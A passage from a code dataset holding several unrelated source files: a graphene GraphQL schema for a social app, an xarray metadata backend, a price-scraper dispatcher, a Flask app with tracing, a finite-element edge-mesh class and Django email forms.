addLike(graphene.Mutation):\n success = graphene.Boolean()\n likes = graphene.Int()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n typeinfo = graphene.String(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, typeinfo, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return addLike(success=False)\n\n elif typeinfo != 'P' and typeinfo != 'C':\n return addLike(success=False)\n\n if typeinfo == 'P':\n try:\n post = PostModel.objects.get(post_id=record)\n user_to = post.user\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n\n like = LikeModel(user_from=user_from, user_to=user_to, type=typeinfo, record_id=record)\n like.save()\n\n if user_to.kakaoID != kakaoID:\n addHistory = HistoryModel(user=user_to, type='L', record_id=like.like_id)\n addHistory.save()\n\n post.like_count += 1\n post.save()\n\n return addLike(success=True, likes=post.like_count)\n\n except:\n return addLike(success=False)\n\n else:\n try:\n comment = CommentModel.objects.get(comment_id=record)\n user_to = comment.user\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n\n like = LikeModel(user_from=user_from, user_to=user_to, type=typeinfo, record_id=record)\n like.save()\n\n if user_to.kakaoID != kakaoID:\n addHistory = HistoryModel(user=user_to, type='L', record_id=like.like_id)\n addHistory.save()\n\n comment.like_count += 1\n comment.save()\n\n return addLike(success=True, likes=comment.like_count)\n\n except:\n return addLike(success=False)\n\n\nclass unLike(graphene.Mutation):\n success = graphene.Boolean()\n likes = graphene.Int()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n typeinfo = graphene.String(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, typeinfo, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return unLike(success=False)\n\n elif typeinfo != 'P' and typeinfo != 'C':\n return unLike(success=False)\n\n if typeinfo == 'P':\n try:\n post = PostModel.objects.get(post_id=record)\n user_to = post.user\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n\n like = LikeModel.objects.get(user_from=user_from, user_to=user_to, type=typeinfo, record_id=record)\n like.delete()\n\n post.like_count -= 1\n post.save()\n\n return unLike(success=True, likes=post.like_count)\n except:\n return unLike(success=False)\n\n else:\n try:\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n\n like = LikeModel.objects.get(user_from=user_from, type=typeinfo, record_id=record)\n comment = CommentModel.objects.get(comment_id=like.record_id)\n\n like.delete()\n\n comment.like_count -= 1\n comment.save()\n\n return unLike(success=True, likes=comment.like_count)\n except:\n return unLike(success=False)\n\n\nclass addComment(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n record = graphene.Int(required=True)\n text = graphene.String(required=True)\n parent = graphene.Int()\n\n def mutate(self, info, accessToken, record, text, parent=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return addComment(success=False)\n\n try:\n post = PostModel.objects.get(post_id=record)\n if not post.allow_comment:\n return addComment(success=False)\n\n user = UserModel.objects.get(kakaoID=kakaoID)\n notice_to = UserModel.objects.get(user_id=post.user_id)\n\n comment = CommentModel(user=user, post_id=record, text_comment=text)\n\n if parent:\n try:\n parent_comment = 
CommentModel.objects.get(comment_id=parent)\n if parent_comment.parent:\n return addComment(success=False)\n notice_to = UserModel.objects.get(user_id=parent_comment.user_id)\n\n except:\n return addComment(success=False)\n comment.parent = parent\n\n comment.save()\n\n if user.user_id != notice_to.user_id:\n addHistory = HistoryModel(user=notice_to, type='C', record_id=comment.comment_id)\n addHistory.save()\n\n post.comment_count += 1\n post.save()\n return addComment(success=True)\n\n except:\n return addComment(success=False)\n\n\nclass removeComment(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return removeComment(success=False)\n\n try:\n user = UserModel.objects.get(kakaoID=kakaoID)\n comment = CommentModel.objects.get(user=user, comment_id=record)\n comments = CommentModel.objects.filter(parent=comment.comment_id)\n likes = LikeModel.objects.filter(record_id=record, type='C')\n post = PostModel.objects.get(post_id=comment.post_id)\n total_c = comments.count() + 1\n post.comment_count -= total_c\n post.save()\n if likes.count():\n likes.delete()\n if comments.count():\n comments.delete()\n comment.delete()\n return removeComment(success=True)\n except:\n return removeComment(success=False)\n\n\nclass updateHistorySeen(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return updateHistorySeen(success=False)\n\n try:\n user = UserModel.objects.get(kakaoID=kakaoID)\n history = HistoryModel.objects.get(user=user, history_id=record)\n history.seen = True\n history.save()\n return updateHistorySeen(success=True)\n except:\n return updateHistorySeen(success=False)\n\n\nclass deactivateHistory(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return deactivateHistory(success=False)\n\n try:\n user = UserModel.objects.get(kakaoID=kakaoID)\n history = HistoryModel.objects.get(user=user, history_id=record)\n history.is_active = False\n history.save()\n return deactivateHistory(success=True)\n except:\n return deactivateHistory(success=False)\n\n\nclass getHistoryDetail(graphene.Mutation):\n username = graphene.String()\n success = graphene.Boolean()\n profile = graphene.String()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return getHistoryDetail(success=False, username=\"\", profile=\"\")\n\n try:\n history = HistoryModel.objects.get(user__kakaoID=kakaoID, history_id=record)\n if history.type == 'L':\n like = LikeModel.objects.get(like_id=history.record_id)\n return getHistoryDetail(success=True, username=like.user_from.name, profile=like.user_from.profile)\n elif history.type == 'F':\n follow = FollowModel.objects.get(follow_id=history.record_id)\n return getHistoryDetail(success=True, username=follow.user_from.name, profile=follow.user_from.profile)\n elif history.type == 'C':\n 
comment = CommentModel.objects.get(comment_id=history.record_id)\n return getHistoryDetail(success=True, username=comment.user.name, profile=comment.user.profile)\n else:\n return getHistoryDetail(success=False, username=\"\", profile=\"\")\n except:\n return getHistoryDetail(success=False, username=\"\", profile=\"\")\n\n\nclass createChatroom(graphene.Mutation):\n success = graphene.Boolean()\n id = graphene.Int()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n username = graphene.String(required=True)\n\n def mutate(self, info, accessToken, username):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return createChatroom(success=False, id=-1)\n\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n try:\n user_to = UserModel.objects.get(name=username)\n except:\n return createChatroom(success=False, id=-1)\n\n if user_from == user_to:\n return createChatroom(success=False, id=-1)\n\n chatrooms = ChatroomModel.objects.filter(user_from=user_from, user_to=user_to)\n chatrooms |= ChatroomModel.objects.filter(user_to=user_from, user_from=user_to)\n\n if chatrooms.exists():\n return createChatroom(success=False, id=-1)\n\n chatroom = ChatroomModel(user_from=user_from, user_to=user_to)\n chatroom.save()\n return createChatroom(success=True, id=chatroom.chatroom_id)\n\n\nclass leaveChatroom(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n username = graphene.String(required=True)\n\n def mutate(self, info, accessToken, username):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return leaveChatroom(success=False)\n\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n try:\n user_to = UserModel.objects.get(name=username)\n except:\n return leaveChatroom(success=False)\n\n if user_from == user_to:\n return leaveChatroom(success=False)\n\n try:\n chatroom = ChatroomModel.objects.get(user_from=user_from, user_to=user_to)\n except:\n try:\n chatroom = ChatroomModel.objects.get(user_from=user_to, user_to=user_from)\n except:\n return leaveChatroom(success=False)\n\n messages = MessageModel.objects.filter(chatroom_id=chatroom.chatroom_id).delete()\n chatroom.delete()\n return leaveChatroom(success=True)\n\n\nclass sendMessage(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n username = graphene.String(required=True)\n chatid = graphene.Int(required=True)\n msg = graphene.String(required=True)\n\n def mutate(self, info, accessToken, username, chatid, msg):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return sendMessage(success=False)\n\n me = UserModel.objects.get(kakaoID=kakaoID)\n try:\n you = UserModel.objects.get(name=username)\n except:\n return sendMessage(success=False)\n\n try:\n chatroom = ChatroomModel.objects.get(chatroom_id=chatid)\n if chatroom.user_from != me and chatroom.user_to != me:\n return sendMessage(success=False)\n if chatroom.user_from != you and chatroom.user_to != you:\n return sendMessage(success=False)\n except:\n return sendMessage(success=False)\n\n message = MessageModel(sender=me, chatroom_id=chatid, has_seen=False, text_message=msg)\n message.save()\n return sendMessage(success=True)\n\n\nclass deleteMessage(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n chatid = graphene.Int(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, chatid, record):\n 
kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return deleteMessage(success=False)\n\n me = UserModel.objects.get(kakaoID=kakaoID)\n\n try:\n chatroom = ChatroomModel.objects.get(chatroom_id=chatid)\n if chatroom.user_from != me and chatroom.user_to != me:\n return deleteMessage(success=False)\n except:\n return deleteMessage(success=False)\n\n try:\n message = MessageModel.objects.get(sender=me, chatroom_id=chatid, message_id=record)\n except:\n return deleteMessage(success=False)\n\n message.delete()\n return deleteMessage(success=True)\n\n\nclass Mutation(graphene.ObjectType):\n create_user = CreateUser.Field()\n upload_profile = UploadProfile.Field()\n edit_profile = EditProfile.Field()\n add_post = AddPost.Field()\n edit_post = EditPost.Field()\n remove_post = RemovePost.Field()\n add_follow = addFollow.Field()\n un_follow = unFollow.Field()\n add_like = addLike.Field()\n un_like = unLike.Field()\n add_comment = addComment.Field()\n remove_comment = removeComment.Field()\n update_history_seen = updateHistorySeen.Field()\n deactivate_history = deactivateHistory.Field()\n get_history_detail = getHistoryDetail.Field()\n create_chatroom = createChatroom.Field()\n leave_chatroom = leaveChatroom.Field()\n send_message = sendMessage.Field()\n delete_message = deleteMessage.Field()\n\n\nschema = graphene.Schema(\n query=Query,\n mutation=Mutation\n)\n","repo_name":"onsoim/aintstagram","sub_path":"backend_api/code/backend_aintstagram/api/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":30824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17593861916","text":"# encoding: utf-8\n\"\"\"\nCollection of functions which can be used to extract metadata from file headers\n\"\"\"\n__author__ = \"Richard Smith\"\n__date__ = \"27 May 2021\"\n__copyright__ = \"Copyright 2018 United Kingdom Research and Innovation\"\n__license__ = \"BSD - see LICENSE file in top-level package directory\"\n__contact__ = \"richard.d.smith@stfc.ac.uk\"\n\nimport xarray as xr\nfrom xarray.backends.plugins import guess_engine\n\n\nclass XarrayBackend:\n \"\"\"\n Xarray\n ------\n\n Backend Name: ``Xarray``\n\n Description:\n Takes an input string and returns a boolean on whether this\n backend can open that file.\n \"\"\"\n\n def guess_can_open(self, filepath: str) -> bool:\n \"\"\"Return a boolean on whether this backend can open that file.\"\"\"\n try:\n self.engine = guess_engine(filepath)\n return True\n except ValueError:\n return False\n\n def attr_extraction(\n self, file: str, attributes: list, backend_kwargs: dict\n ) -> dict:\n \"\"\"\n Takes a filepath and list of attributes and extracts the metadata.\n\n :param file: file-like object\n :param attributes: attributes to extract\n :param backend_kwargs: kwargs to send to xarray.open_dataset(). e.g. 
engine to\n specify different engines to use with grib data.\n\n :return: Dictionary of extracted attributes\n \"\"\"\n\n ds = xr.open_dataset(file, engine=self.engine, **backend_kwargs)\n\n extracted_metadata = {}\n for attr in attributes:\n\n value = ds.attrs.get(attr)\n if value:\n extracted_metadata[attr] = value\n\n return extracted_metadata\n","repo_name":"cedadev/stac-generator","sub_path":"stac_generator/plugins/extraction_methods/header/backends/xarray.py","file_name":"xarray.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"40100699846","text":"from typing import List\nfrom bs4 import BeautifulSoup\nimport requests\nfrom . import pickaboo, gadstyle\n\n\necoms = [\n (pickaboo.domain, pickaboo.getProduct, pickaboo.searchProduct),\n (gadstyle.domain, gadstyle.getProduct, gadstyle.searchProduct),\n]\n\n\ndef getProduct(url) -> dict:\n url = url.replace(' ', '')\n # if(url.find(pickabooDomain) > 0):\n # return pickaboo(url)\n for ecom in ecoms:\n if(url.find(ecom[0]) > 0):\n return ecom[1](url)\n return None\n\n\ndef searchProduct(query) ->List[dict]:\n products = []\n for ecom in ecoms:\n products.extend(ecom[2](query))\n return products\n\n\nif __name__ == '__main__':\n # print(getProduct('https://www.pickaboo.com/redmi-note-11-6gb-128gb.html'))\n print(searchProduct('anker q30'))\n","repo_name":"nokla007/pricetracker_server","sub_path":"services/ecomService.py","file_name":"ecomService.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42062444122","text":"import logging\nimport logging.handlers\nimport os\nimport sys\n\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom opentelemetry import trace\nfrom opentelemetry.exporter.jaeger.thrift import JaegerExporter\nfrom opentelemetry.instrumentation.flask import FlaskInstrumentor\nfrom opentelemetry.instrumentation.pika import PikaInstrumentor\nfrom opentelemetry.instrumentation.requests import RequestsInstrumentor\nfrom opentelemetry.sdk.resources import Resource\nfrom opentelemetry.sdk.resources import SERVICE_NAME\nfrom opentelemetry.sdk.trace import TracerProvider\nfrom opentelemetry.sdk.trace.export import BatchSpanProcessor\n\nfrom app import api\nfrom config import ConfigClass # noqa\n\n\ndef create_app():\n \"\"\"Initialize and configure app.\"\"\"\n\n app = Flask(__name__)\n app.config.from_object(__name__ + '.ConfigClass')\n CORS(\n app,\n origins=\"*\",\n allow_headers=[\"Content-Type\", \"Authorization\", \"Access-Control-Allow-Credentials\"],\n supports_credentials=True,\n intercept_exceptions=False,\n )\n api.module_api.init_app(app)\n if not os.path.exists('./logs'):\n os.makedirs('./logs')\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n file_handler = logging.FileHandler('./logs/queue.log')\n file_handler.setFormatter(formatter)\n app.logger.setLevel(logging.DEBUG)\n # Standard Out Handler\n stdout_handler = logging.StreamHandler(sys.stdout)\n stdout_handler.setFormatter(formatter)\n stdout_handler.setLevel(logging.DEBUG)\n # Standard Err Handler\n stderr_handler = logging.StreamHandler(sys.stderr)\n stderr_handler.setFormatter(formatter)\n stderr_handler.setLevel(logging.ERROR)\n\n app.logger.addHandler(file_handler)\n app.logger.addHandler(stdout_handler)\n app.logger.addHandler(stderr_handler)\n\n app.logger.info('start')\n\n return app\n\n\ndef 
instrument_app(app: Flask) -> None:\n \"\"\"Instrument the application with OpenTelemetry tracing.\"\"\"\n\n if ConfigClass.OPEN_TELEMETRY_ENABLED != \"TRUE\":\n return\n\n tracer_provider = TracerProvider(resource=Resource.create({SERVICE_NAME: ConfigClass.APP_NAME}))\n trace.set_tracer_provider(tracer_provider)\n\n FlaskInstrumentor().instrument_app(app)\n PikaInstrumentor().instrument()\n RequestsInstrumentor().instrument()\n\n jaeger_exporter = JaegerExporter(\n agent_host_name=ConfigClass.OPEN_TELEMETRY_HOST, agent_port=ConfigClass.OPEN_TELEMETRY_PORT\n )\n\n tracer_provider.add_span_processor(BatchSpanProcessor(jaeger_exporter))\n","repo_name":"vre-charite/service_queue","sub_path":"producer/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40710716364","text":"import numpy as np\n\nfrom scipy.sparse import csr_matrix\nfrom numpy.typing import NDArray\n\nfrom typing import Union\nfrom types import ModuleType\n\nfrom .mesh_base import Mesh, Plotable\nfrom .mesh_data_structure import Mesh1dDataStructure, HomogeneousMeshDS\n\nclass EdgeMeshDataStructure(Mesh1dDataStructure, HomogeneousMeshDS):\n def __init__(self, NN, cell):\n self.NN = NN\n self.cell = cell \n self.NC = len(cell)\n\n def construct(self) -> None: \n \"\"\"\n @brief 覆盖基类的 construct 函数\n \"\"\"\n return None\n\n def node_to_cell(self):\n NN = self.NN\n NC = self.NC\n I = self.cell.flat\n J = np.repeat(range(NC), 2)\n val = np.ones(2*NC, dtype=np.bool_)\n node2edge = csr_matrix((val, (I, J)), shape=(NN, NC))\n return node2edge\n\n face_to_cell = node_to_cell\n\n## @defgroup MeshGenerators Meshgeneration algorithms on commonly used domain \n## @defgroup MeshQuality\nclass EdgeMesh(Mesh, Plotable):\n def __init__(self, node, cell):\n self.node = node\n self.itype = cell.dtype\n self.ftype = node.dtype\n\n self.meshtype = 'edge'\n \n NN = len(node)\n self.ds = EdgeMeshDataStructure(NN, cell)\n\n self.nodedata = {}\n self.celldata = {}\n self.edgedata = self.celldata\n self.facedata = self.nodedata\n self.meshdata = {}\n\n self.cell_length = self.edge_length\n self.cell_tangent = self.edge_tangent\n self.cell_unit_tangent = self.edge_unit_tangent\n\n self.cell_to_ipoint = self.edge_to_ipoint\n self.face_to_ipoint = self.node_to_ipoint\n self.shape_function = self._shape_function\n\n def ref_cell_measure(self):\n return 1.0\n\n def ref_face_measure(self):\n return 0.0\n\n def integrator(self, q: int, etype: Union[str, int]='cell'):\n \"\"\"\n @brief 返回第 k 个高斯积分公式。\n \"\"\"\n from ..quadrature import GaussLegendreQuadrature\n return GaussLegendreQuadrature(q)\n\n def grad_shape_function(self, bc: NDArray, p: int=1, variables: str='x', index=np.s_[:]):\n \"\"\"\n @brief \n \"\"\"\n R = self._grad_shape_function(bc, p=p)\n if variables == 'x':\n Dlambda = self.grad_lambda(index=index)\n gphi = np.einsum('...ij, cjm->...cim', R, Dlambda)\n return gphi \n else:\n return R\n\n def entity_measure(self, etype: Union[int, str]='cell', index=np.s_[:], node=None):\n \"\"\"\n \"\"\"\n if etype in {1, 'cell', 'edge'}:\n return self.cell_length(index=index, node=None)\n elif etype in {0, 'face', 'node'}:\n return np.array([0.0], dtype=self.ftype)\n else:\n raise ValueError(f\"entity type: {etype} is wrong!\")\n\n def grad_lambda(self, index=np.s_[:]):\n \"\"\"\n @brief 计算所有单元上重心坐标函数的导数\n \"\"\"\n node = self.entity('node')\n cell = self.entity('cell', index=index)\n v = node[cell[:, 1]] - 
node[cell[:, 0]]\n NC = len(cell) \n GD = self.geo_dimension()\n Dlambda = np.zeros((NC, 2, GD), dtype=self.ftype)\n h2 = np.sum(v**2, axis=-1)\n v /=h2.reshape(-1, 1)\n Dlambda[:, 0, :] = -v\n Dlambda[:, 1, :] = v\n return Dlambda\n\n def number_of_local_ipoints(self, p: int, iptype: Union[int, str]='cell') -> int:\n return p + 1\n\n def number_of_global_ipoints(self, p: int) -> int:\n NN = self.number_of_nodes()\n NC = self.number_of_cells()\n return NN + (p-1)*NC\n\n def interpolation_points(self, p: int, index=np.s_[:]) -> NDArray:\n GD = self.geo_dimension()\n node = self.entity('node')\n\n if p == 1:\n return node\n else:\n NN = self.number_of_nodes()\n NC = self.number_of_cells()\n gdof = NN + NC*(p-1)\n ipoint = np.zeros((gdof, GD), dtype=self.ftype)\n ipoint[:NN] = node\n cell = self.entity('cell')\n w = np.zeros((p-1,2), dtype=np.float64)\n w[:,0] = np.arange(p-1, 0, -1)/p\n w[:,1] = w[-1::-1, 0]\n GD = self.geo_dimension()\n ipoint[NN:NN+(p-1)*NC] = np.einsum('ij, kj...->ki...', w,\n node[cell]).reshape(-1, GD)\n\n return ipoint\n\n def face_unit_normal(self, index=np.s_[:], node=None):\n \"\"\"\n @brief\n \"\"\"\n raise NotImplementedError\n\n def cell_normal(self, index=np.s_[:], node=None):\n \"\"\"\n @brief 单元的法线方向\n \"\"\"\n assert self.geo_dimension() == 2\n v = self.cell_tangent(index=index, node=node)\n w = np.array([(0, -1),(1, 0)])\n return v@w\n\n @classmethod\n def from_inp_file(cls, fname):\n from .inp_file_reader import InpFileReader\n\n reader = InpFileReader(fname)\n reader.parse()\n\n # 提取所需的数据\n parts = reader.parts\n\n # 从 parts 中获取 node 和 element 数据\n part_name = next(iter(parts)) # parts 的名称,需要根据 .inp 文件来选择正确的 parts 名称\n print(\"part_name:\", part_name)\n part_data = parts[part_name]\n print(\"part_data:\", part_data)\n node_data = part_data['node']\n print(\"node_date:\", node_data)\n node = node_data[0]\n node_index = node_data[-1]\n # print(\"node_index:\", node_index)\n element_data = part_data['elem']\n print(\"element_data:\", element_data)\n print(\"element_type:\", list(element_data.keys()))\n element_1 = element_data[list(element_data.keys())[0]]\n # print(\"element_1:\", element_1)\n element_2 = element_data[list(element_data.keys())[-1]]\n # print(\"element_2:\", element_2)\n cell = np.concatenate([data[0] for _, data in element_data.items()])\n mesh = cls(node, cell)\n\n nset_data = part_data['nset']\n print(\"nset_data:\", nset_data)\n print(\"nset_nset:\", list(nset_data.keys()))\n\n elset_data = part_data['elset']\n print(\"elset_data:\", elset_data)\n print(\"elset_elset:\", list(elset_data.keys()))\n\n orientation_data = part_data['orientation']\n print(\"orientation_data:\", orientation_data)\n print(\"orientation_name:\", list(orientation_data.keys()))\n\n solid_section_data = part_data['solid_section']\n print(\"solid_section_data:\", solid_section_data)\n print(\"solid_section_elset:\", list(solid_section_data.keys()))\n\n beam_section_data = part_data['beam_section']\n print(\"beam_section_data:\", beam_section_data)\n print(\"beam_section_elset:\", list(beam_section_data.keys()))\n\n assemblys = reader.assembly\n\n assembly_name = next(iter(assemblys)) # parts 的名称,需要根据 .inp 文件来选择正确的 parts 名称\n print(\"assembly_name:\", assembly_name)\n\n assembly_data = assemblys[assembly_name]\n print(\"assembly_data:\", assembly_data)\n\n instance_data = assembly_data['instance']\n print(\"instance_data:\", instance_data)\n print(\"instance_name:\", list(instance_data.keys()))\n\n nset_assembly_data = assembly_data['nset']\n 
print(\"nset_assembly_data:\", nset_assembly_data)\n print(\"nset_assembly_nset:\", list(nset_assembly_data.keys()))\n\n return mesh\n\n ## @ingroup MeshGenerators\n @classmethod\n def from_triangle_mesh(cls, mesh):\n pass\n\n ## @ingroup MeshGenerators\n @classmethod\n def from_tetrahedron_mesh(cls, mesh):\n pass\n\n ## @ingroup MeshGenerators\n @classmethod\n def from_tower(cls):\n node = np.array([\n [-950, 0, 5080], [950, 0, 5080], [-950, 950, 2540], \n [950, 950, 2540], [950, -950, 2540], [-950, -950, 2540],\n [-2540, 2540, 0], [2540, 2540, 0], [2540, -2540, 0], \n [-2540, -2540, 0]], dtype=np.float64)\n cell = np.array([\n [0, 1], [3, 0], [1, 2], [1, 5], [0, 4], \n [1, 3], [1, 4], [0, 2], [0, 5], [2, 5],\n [4, 3], [2, 3], [4, 5], [2, 9], [6, 5], \n [8, 3], [7, 4], [6, 3], [2, 7], [9, 4],\n [8, 5], [9, 5], [2, 6], [7, 3], [8, 4]], dtype=np.int_)\n mesh = cls(node, cell)\n\n mesh.meshdata['disp_bc'] = (np.array([6, 7, 8, 9], dtype=np.int_), np.zeros(3))\n mesh.meshdata['force_bc'] = (np.array([0, 1], dtype=np.int_), np.array([0, 900, 0]))\n\n return mesh \n\n ## @ingroup MeshGenerators\n @classmethod\n def from_four_bar(cls):\n # 单位为 mm\n node = np.array([\n [0, 0], [400, 0], \n [400, 300], [0, 300]], dtype=np.float64)\n cell = np.array([\n [0, 1], [2, 1], \n [0, 2], [3, 2]], dtype=np.int_)\n mesh = cls(node, cell)\n\n mesh.meshdata['disp_bc'] = (np.array([0, 1, 3], dtype=np.int_), np.zeros(2))\n mesh.meshdata['force_bc'] = (np.array([1, 2], dtype=np.int_), \n np.array([[2e4, 0], [0, -2.5e4]], dtype=np.float64))\n\n return mesh \n\n ## @ingroup MeshGenerators\n @classmethod\n def from_balcony_truss(cls):\n # 单位为英寸 in\n node = np.array([\n [0, 0], [36, 0], \n [0, 36], [36, 36], [72, 36]], dtype=np.float64)\n cell = np.array([\n [0, 1], [1, 2], [2, 3],\n [1, 3], [1, 4], [3, 4]], dtype=np.int_)\n mesh = cls(node, cell)\n\n mesh.meshdata['disp_bc'] = (np.array([0, 2], dtype=np.int_), np.zeros(2))\n mesh.meshdata['force_bc'] = (np.array([3, 4], dtype=np.int_), np.array([[0, -500], [0, -500]]))\n\n return mesh \n\n ## @ingroup MeshGenerators\n @classmethod\n def from_simple_3d_truss(cls):\n # 单位为英寸 in\n node = np.array([\n [0, 0, 36], [72, 0, 0], \n [0, 0, -36], [0, 72, 0]], dtype=np.float64)\n cell = np.array([\n [0, 1], [0, 2], [0, 3],\n [1, 2], [1, 3], [2, 3]], dtype=np.int_)\n mesh = cls(node, cell)\n\n mesh.meshdata['disp_bc'] = (np.array([6, 7, 8, 9], dtype=np.int_), np.zeros(3))\n mesh.meshdata['force_bc'] = (np.array([0, 1], dtype=np.int_), np.array([0, 900, 0]))\n\n return mesh \n\n\n ## @ingroup MeshGenerators\n @classmethod\n def from_cantilever(cls):\n # 单位为 m\n node = np.array([\n [0], [5], [7.5]], dtype=np.float64)\n cell = np.array([\n [0, 1], [1, 2]], dtype=np.int_)\n mesh = cls(node, cell)\n\n mesh.meshdata['disp_bc'] = (np.array([6, 7, 8, 9], dtype=np.int_), np.zeros(3))\n mesh.meshdata['force_bc'] = (np.array([0, 1], dtype=np.int_), np.array([0, 900, 0]))\n\n return mesh \n\n\n ## @ingroup MeshGenerators\n @classmethod\n def from_three_beam(cls):\n # 单位为 m\n node = np.array([\n [0, 0.96], [1.44, 0.96], \n [0, 0], [1.44, 0]], dtype=np.float64)\n cell = np.array([\n [0, 1], [2, 0], [3, 1]], dtype=np.int_)\n mesh = cls(node, cell)\n\n mesh.meshdata['disp_bc'] = (np.array([6, 7, 8, 9], dtype=np.int_), np.zeros(3))\n mesh.meshdata['force_bc'] = (np.array([0, 1], dtype=np.int_), np.array([0, 900, 0]))\n\n return mesh 
\n\n\nEdgeMesh.set_ploter('1d')\n\n","repo_name":"weihuayi/fealpy","sub_path":"fealpy/mesh/edge_mesh.py","file_name":"edge_mesh.py","file_ext":"py","file_size_in_byte":11285,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"} +{"seq_id":"39262775607","text":"# -*- coding: utf-8 -*-\nimport pytz\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.forms.models import modelformset_factory, BaseModelFormSet\nfrom django.utils import timezone\nfrom booking.models import Course, Event\n\nfrom ..views.utils import get_current_courses, get_current_and_started_courses\n\nDATETIME_FORMAT = '%a %d %b %y, %H:%M'\n\ndef get_event_names():\n\n def callable():\n EVENT_CHOICES = [\n (\n event.id,\n f\"{event.name} - {event.start.astimezone(pytz.timezone('Europe/London')).strftime(DATETIME_FORMAT)}\"\n )\n for event in Event.objects.filter(start__gte=timezone.now()).order_by('start')]\n return tuple(EVENT_CHOICES)\n\n return callable\n\n\ndef get_course_names():\n\n def callable():\n def _course_start(course):\n if course.start:\n return f\"start {course.start.astimezone(pytz.timezone('Europe/London')).strftime(DATETIME_FORMAT)}\"\n return \"not started\"\n # exclude not started courses\n queryset = Course.objects.all()\n COURSE_CHOICES = [(course.id, f\"{course.name} - {_course_start(course)}\") for course in get_current_and_started_courses(queryset)]\n return tuple(COURSE_CHOICES)\n return callable\n\n\ndef get_students():\n\n def callable():\n return tuple(\n [\n (user.id, '{} {} ({})'.format(\n user.first_name, user.last_name, user.username\n )) for user in User.objects.all()\n ]\n )\n return callable\n\n\nclass UserFilterForm(forms.Form):\n\n events = forms.MultipleChoiceField(\n choices=get_event_names(),\n widget=forms.SelectMultiple(attrs={\"class\": \"form-control\"}),\n required=False,\n label=\"\"\n )\n\n courses = forms.MultipleChoiceField(\n choices=get_course_names(),\n widget=forms.SelectMultiple(attrs={\"class\": \"form-control\"}),\n required=False,\n label=\"\"\n )\n students = forms.MultipleChoiceField(\n choices=get_students(),\n widget=forms.SelectMultiple(attrs={\"class\": \"form-control\"}),\n required=False,\n label=\"\"\n )\n\n\nclass ChooseUsersBaseFormSet(BaseModelFormSet):\n\n def add_fields(self, form, index):\n super(ChooseUsersBaseFormSet, self).add_fields(form, index)\n\n form.fields['email_user'] = forms.BooleanField(\n widget=forms.CheckboxInput(),\n initial=True,\n required=False\n )\n\nChooseUsersFormSet = modelformset_factory(\n User,\n fields=('id',),\n formset=ChooseUsersBaseFormSet,\n extra=0,\n max_num=2000,\n can_delete=False)\n\n\nclass EmailUsersForm(forms.Form):\n subject = forms.CharField(max_length=255, required=True,\n widget=forms.TextInput(\n attrs={'class': 'form-control'}))\n from_address = forms.EmailField(max_length=255,\n initial=settings.DEFAULT_STUDIO_EMAIL,\n required=True,\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n help_text='This will be the reply-to address')\n cc = forms.BooleanField(\n widget=forms.CheckboxInput(),\n label=\"cc. 
